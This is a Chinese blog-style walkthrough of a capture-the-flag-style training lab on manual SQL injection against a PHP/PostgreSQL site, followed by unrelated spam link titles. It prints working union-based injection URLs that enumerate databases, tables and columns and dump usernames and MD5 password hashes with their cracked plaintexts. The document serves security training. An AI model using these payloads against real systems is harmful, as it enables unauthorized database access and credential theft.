当前位置: 首页 > news >正文

用织梦做的网站好还是cms搭建网站需要的软件下载

news 2025/9/16 19:15:54
用织梦做的网站好还是cms,搭建网站需要的软件下载,静态网站怎么做百度推广,重庆景点门票价格一览表———靶场专栏——— 声明:文章由作者weoptions学习或练习过程中的步骤及思路,非正式答案,仅供学习和参考。 靶场背景: 来源: 墨者学院 简介: 安全工程师"墨者"最近在练习SQL手工注入漏洞&#…

———靶场专栏———

声明:文章由作者weoptions学习或练习过程中的步骤及思路,非正式答案,仅供学习和参考。

靶场背景:

来源:

        墨者学院

简介:

        安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+PostgreSQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标:

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解PostgreSQL的数据结构;
4.了解字符串的MD5加解密;

解题方向:

        手工进行SQL注入测试,获取管理密码登录。

解题思路:

        postgreSQL和mysql语法和数据库结构上有区别,但整体思路区别不大。

还是熟悉的管理系统登陆界面,还是熟悉的平台停机维护通知。

解题步骤:

        

        一、验证注入点

http://124.70.71.251:41459/new_list.php?id=1 and 1=1

页面显示正常

报错一下看看

http://124.70.71.251:41459/new_list.php?id=1 and 1=2

ok,那注入点就是在这里了。

        二、order by猜列

确定了,四个字段。

        三、测试回显

用select语句测一下回显。跟mysql有些不一样,postgreSQL是用null来测试回显点的。

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,null,null

依次给每个null加上单引号。

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,'null','null',null

第二个和第三个位置有回显,接下来进行注入。

        四、数据库信息获取

version()数据库版本

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,version(),null

PostgreSQL 9.5.13 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.9) 5.4.0 20160609, 64-bit

current_user数据库用户

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,current_user,null

postgres

current_database()数据库名

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,current_database(),null

mozhedvcms

        五、查数据

①查数据库名

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(datname,','),null from pg_database

template1,template0,postgres,mozhedvcms

②查表名

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(tablename,','),null from pg_tables where schemaname='public'
http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(relname,','),null from pg_stat_user_tables

notice,reg_users

③查列名

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'

id,name,password,status

④查数据

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

六、MD5解密登陆

(1)mozhe1,085631f437f337ecbb741d2d9bb73b7d(544041)

(2)mozhe2,1c63129ae9db9c60c3e8aa94d3e00495(1qaz2wsx)

mozhe1成功登陆,KEY:mozhe2cf8a74af7074d9688e835190f9

总结:

        难度:★★☆☆☆☆☆☆☆☆

        分析:

        很难评价,直接就把不熟练写在了脸上了,而且原理还是很模糊。

http://www.yayakq.cn/news/328089/

相关文章:

  • 成都市微信网站建设报价基层建设论文收录在哪个网站
  • 地方网站运营方案太原网站建设需要多少钱
  • 营销型网站公司名称翻译网站开发
  • 博物馆网站 建设方案咨询公司名称
  • 网站建设晋丰重庆城乡建设局网站
  • 简单的网站开发在线制作logo图片
  • 购物网站开发什么是网站开发初学seo网站推广需要怎么做
  • 宁波seo网站推广网站关键词百度首页消失
  • 郴州网站建设流程网络广告设计制作
  • 单纯做网站的公司济宁专业网站开发公司
  • 第一次做网站时是怎样的心情虚拟主机wordpress安装
  • 造价师证书在建设部网站查询重庆招投标信息网
  • 网站中 点击出现登录框怎么做dw网页制作教程动态
  • 腾讯云 门户网站建设做域名交易网站
  • 网站关键词收入软件做网站和网站页面设计
  • 网站页脚设计的几个小技巧软件开发包括什么内容
  • 无锡品牌学会网站建设免费网站 推广网站
  • 网站策划书怎么做的美观wordpress 网址导航 主题
  • 做正规网站建筑工程网上教育平台
  • 目前比较新的网站建设技术自己做网站切入地图
  • 网站注销申请为什么招聘网站做不大
  • 一个主机可以建设多少个网站完成一个个人主页网站的制作
  • 网站域名如何注册简单项目计划书
  • 网站必须兼容哪些浏览器品牌形象设计
  • 网站做rss+wordpress中国住房和城乡建设局官网
  • 怎么做教育类型的网站网站备案查询工具
  • 北京住房与建设部网站做设计去哪些网站下载素材
  • 汕头网站制作后缀网页视频怎么下载不了
  • 口碑好的网站建设价格wordpress音乐主题musik汉化
  • 产品网站 模板网站接入服务器商查询